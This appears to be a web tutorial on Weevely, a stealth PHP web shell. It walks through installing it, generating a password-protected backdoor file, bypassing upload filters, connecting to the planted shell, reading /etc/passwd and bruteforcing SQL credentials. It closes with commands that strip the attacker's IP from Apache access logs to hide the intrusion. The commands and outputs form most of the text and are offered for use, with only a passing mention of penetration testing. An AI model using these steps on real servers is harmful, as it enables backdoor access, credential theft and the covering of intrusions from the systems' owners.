Weevely is a stealth PHP web shell that is designed for remote server administration and penetration testing.
It simplifies the administration of your web account, especially with unprivileged accounts such as free hosting services and other shared environments. It is an essential tool for post exploitation tasks like privilege escalation and access maintained even in restricted environments, and can be used as stealth backdoor.
- Ssh-like terminal
- SQL console pivoted on target
- HTTP proxy pivoted on target
- Host configuration security auditing
- Mount of the remote filesystem
- Network scan pivoted on target
- File upload and download
- Reverse and direct TCP shell
- Meterpreter support
- Service account Bruteforce
- Compressed archive management
root@cybarrior:~# pip install prettytable Mako PyYAML python-dateutil PySocks –upgrade root@cybarrior:~# apt-get install g++ python-pip libyaml-dev python-dev
Generate a backdoor
root@ddos:~# weevely generate ddos ddos.php
Generated backdoor with password ‘ddos’ in ‘ddos.php’ of 1439 byte size.
bd core ddos.php modules utils weevely.py
You need to use some technique for uploading webshell like double extension, bypass image type validation, bypass whitelist/blacklist. View here.
Connect to the backdoor
root@ddos:/usr/share/weevely# weevely http://192.168.1.8/ddos.php ddos
Bypass Policy to Read /etc/passwd
www-data@ddos:/etc $ audit_etcpasswd
Guess the SQL user credentials
This tip teaches you how to guess the credentials of multiple SQL users.
weevely> bruteforce_sql –help
This skill to teach you how to clear the server in the tracking records.
We use the system_info command to find our own ip
www-data@ddos:/var/log $ system_info -info client_ip
We use the grep command to confirm that our ip records in the log file
www-data@ddos:/var/log/apache2 $ cat ‘/var/log/apache2/access.log.1’ |grep “192.168.1.8”
we can see that the activities of our IP address have been recorded, we can again use grep to remove our log from the ip, and then save it to a temporary file
www-data@ddos:/var/log/apache2 $ cat ‘/var/log/apache2/access.log.1’ |grep -v “192.168.1.8” > cleaned.log
Let’s test to see if we’ve deleted it
Then we can replace cleaned.log to access.log.1